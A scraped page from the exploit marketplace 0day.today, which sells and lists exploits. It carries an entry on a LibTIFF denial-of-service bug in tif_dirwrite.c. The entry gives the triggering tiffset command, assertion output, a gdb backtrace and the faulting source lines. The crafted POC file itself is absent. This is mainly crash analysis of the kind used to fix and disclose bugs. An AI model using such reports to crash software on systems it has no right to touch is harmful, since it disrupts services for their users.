0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

LibTIFF - tif_dirwrite.c Denial of Service Exploit

Author

OWL337

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

CVE

Platform

Source: http://bugzilla.maptools.org/show_bug.cgi?id=2712
 
Triggered by  "./tiffset POC1"
 
$ ./tiffset POC1
TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered.
TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered.
poc3: AdobeDeflate compression support is not configured.
tiffset: tif_dirwrite.c:2127: int TIFFWriteDirectoryTagCheckedLong8Array(TIFF
*, uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *): Assertion
`tif->tif_flags&TIFF_BIGTIFF' failed.
Aborted
 
The gdb debugging information is listed below:
(gdb) set args POC1
(gdb) r
...
(gdb) c
Continuing.
TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered.
TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered.
poc2: AdobeDeflate compression support is not configured.
 
Breakpoint 2, TIFFWriteDirectoryTagCheckedLong8Array (tif=<optimized out>,
ndir=<optimized out>, count=1, 
    value=0x615c20, dir=<optimized out>, tag=<optimized out>) at
tif_dirwrite.c:2127
2127        assert(tif->tif_flags&TIFF_BIGTIFF);
(gdb) bt
#0  0x00007ffff746a428 in __GI_raise (sig=sig@entry=6) at
../sysdeps/unix/sysv/linux/raise.c:54
#1  0x00007ffff746c02a in __GI_abort () at abort.c:89
#2  0x00007ffff7462bd7 in __assert_fail_base (fmt=<optimized out>, 
    assertion=assertion@entry=0x7ffff7baf949 "tif->tif_flags&TIFF_BIGTIFF", 
    file=file@entry=0x7ffff7baf5c0 "tif_dirwrite.c", line=line@entry=2127, 
    function=function@entry=0x7ffff7baf8e2 "int
TIFFWriteDirectoryTagCheckedLong8Array(TIFF *, uint32 *, TIFFDirEntry *,
uint16, uint32, uint64 *)") at assert.c:92
#3  0x00007ffff7462c82 in __GI___assert_fail (assertion=0x7ffff7baf949
"tif->tif_flags&TIFF_BIGTIFF", 
    file=0x7ffff7baf5c0 "tif_dirwrite.c", line=2127, 
    function=0x7ffff7baf8e2 "int TIFFWriteDirectoryTagCheckedLong8Array(TIFF *,
uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *)") at assert.c:101
#4  0x00007ffff7b4e9cb in TIFFWriteDirectoryTagCheckedLong8Array (tif=0x615010,
ndir=<optimized out>, count=1, 
    value=0x615c20, dir=<optimized out>, tag=<optimized out>) at
tif_dirwrite.c:2127
#5  TIFFWriteDirectoryTagLong8Array (count=1, value=0x615c20, tif=<optimized
out>, ndir=<optimized out>, 
    dir=<optimized out>, tag=<optimized out>) at tif_dirwrite.c:1462
#6  TIFFWriteDirectorySec (tif=<optimized out>, isimage=<optimized out>,
imagedone=<optimized out>, 
    pdiroff=<optimized out>) at tif_dirwrite.c:746
#7  0x00007ffff7b4f6b5 in TIFFWriteDirectory (tif=0x615010) at
tif_dirwrite.c:184
#8  TIFFRewriteDirectory (tif=<optimized out>) at tif_dirwrite.c:360
#9  0x0000000000402bc7 in main (argc=<optimized out>, argv=<optimized out>) at
tiffset.c:344
 
Trigged in line tif_dirwrite.c:2127 at function
TIFFWriteDirectoryTagCheckedLong8Array()
2122 static int
2123 TIFFWriteDirectoryTagCheckedLong8Array(TIFF* tif, uint32* ndir,
TIFFDirEntry* dir, uint16 tag, uint32 count, uint64*      value)
2124 {       
2125         assert(count<0x20000000);
2126         assert(sizeof(uint64)==8);
2127         assert(tif->tif_flags&TIFF_BIGTIFF);
2128         if (tif->tif_flags&TIFF_SWAB)
2129                 TIFFSwabArrayOfLong8(value,count);
2130        
return(TIFFWriteDirectoryTagData(tif,ndir,dir,tag,TIFF_LONG8,count,count*8,value));
2131 }
 
[note]: Tiffset sets the value of a TIFF header to a specified value.It will
modify the raw POC file,so you'd better make a backup file every time you are
going to run.

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

LibTIFF - tif_dirwrite.c Denial of Service Exploit

Report Error

Report Error